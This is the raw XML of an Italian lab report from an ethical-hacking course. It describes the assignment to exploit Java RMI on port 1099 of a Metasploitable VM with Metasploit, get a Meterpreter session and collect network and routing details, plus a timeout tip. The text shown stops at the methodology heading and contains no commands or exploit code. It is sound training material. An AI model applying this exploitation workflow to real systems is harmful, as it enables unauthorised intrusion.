
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="svg" ContentType="image/svg+xml"/>
  <Default Extension="gif" ContentType="image/gif"/>
  <Default Extension="bmp" ContentType="image/bmp"/>
  <Default Extension="odttf" ContentType="application/vnd.openxmlformats-officedocument.obfuscatedFont"/>
  <Default Extension="jpeg" ContentType="image/jpeg"/>
  <Default Extension="png" ContentType="image/png"/>
  <Default Extension="jpg" ContentType="image/jpeg"/>
  <Default Extension="xml" ContentType="application/xml"/>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400" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000006">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="80" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6d28d9"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>EPICODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000007">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="600" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cybersecurity &amp; Ethical Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000008">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="6d28d9" w:sz="8" w:space="0"/>
        </w:pBdr>
        <w:spacing w:beforeAutospacing="0" w:after="40" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e1b2e"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>RELAZIONE TECNICA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000009">
      <w:pPr>
        <w:spacing w:before="200" w:beforeAutospacing="0" w:after="40" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1e1b2e"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Progetto S7/L5 — Penetration Testing con Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="600" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sfruttamento della vulnerabilità Java RMI su Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9000" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="none" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:sz="4" w:space="0"/>
          <w:insideH w:val="single" w:color="ffffff" w:sz="2" w:space="0"/>
          <w:insideV w:val="single" w:color="ffffff" w:sz="2" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2600"/>
        <w:gridCol w:w="6400"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000000B">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Corso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100001000000"/>
            <w:tcW w:w="6400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000000C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cybersecurity &amp; Ethical Hacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000000D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Modulo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="6400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000000E">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Penetration Testing with Metasploit — S7/L5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000000F">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Obiettivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="6400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000010">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ottenere una sessione Meterpreter sfruttando il servizio Java RMI (porta 1099)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000011">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Macchina attaccante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="6400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000012">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kali Linux — 192.168.11.111</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000013">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Macchina vittima</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="6400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000014">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metasploitable — 192.168.11.112</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000015">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ambiente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="6400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000016">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Laboratorio isolato (UTM / macchine virtuali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000017">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="6400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000018">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>24 luglio 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00000019">
      <w:pPr>
        <w:rPr/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>
</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:beforeAutospacing="0" w:after="140" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6d28d9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>1. Introduzione e obiettivo dell'esercizio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001B">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La presente relazione documenta l'attività di penetration testing condotta in un ambiente di laboratorio isolato, il cui obiettivo è lo sfruttamento di un servizio vulnerabile esposto dalla macchina </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Il servizio in questione è </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java RMI (Remote Method Invocation)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, in ascolto sulla porta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1099/TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Attraverso il framework Metasploit si intende ottenere una sessione Meterpreter interattiva sulla macchina remota e, successivamente, raccogliere alcune evidenze di post-exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e1b2e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.1 Traccia dell'esercizio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001D">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La macchina Metasploitable presenta un servizio vulnerabile sulla porta 1099 (Java RMI). È richiesto di sfruttare la vulnerabilità con Metasploit al fine di ottenere una sessione Meterpreter sulla macchina remota. I requisiti dell'esercizio sono i seguenti:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La macchina attaccante (Kali) deve avere indirizzo IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>192.168.11.111</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La macchina vittima (Metasploitable) deve avere indirizzo IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>192.168.11.112</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000020">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Una volta ottenuta la sessione Meterpreter, occorre raccogliere le seguenti evidenze dalla macchina remota:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000021">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>configurazione di rete;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000022">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>informazioni sulla tabella di routing della macchina vittima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000023">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="40" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000024">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="533400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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000025">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="220" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fig. 1 — Traccia dell'esercizio: obiettivi e requisiti di rete (piattaforma EPICODE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000026">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La documentazione fornita segnala inoltre un possibile errore in fase di exploitation: qualora il server HTTP interno di Metasploit non riceva in tempo la richiesta del payload, l'exploit termina con l'errore </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>«Timeout HTTPDELAY expired»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. In tal caso è sufficiente aumentare il parametro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTPDELAY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (valore consigliato: 20) e rilanciare l'attacco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000027">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="53340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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000028">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="220" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fig. 2 — Nota della traccia: gestione dell'errore «Timeout HTTPDELAY expired» aumentando il parametro HTTPDELAY a 20.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000029">
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:beforeAutospacing="0" w:after="140" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6d28d9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2. Metodologia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002B">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
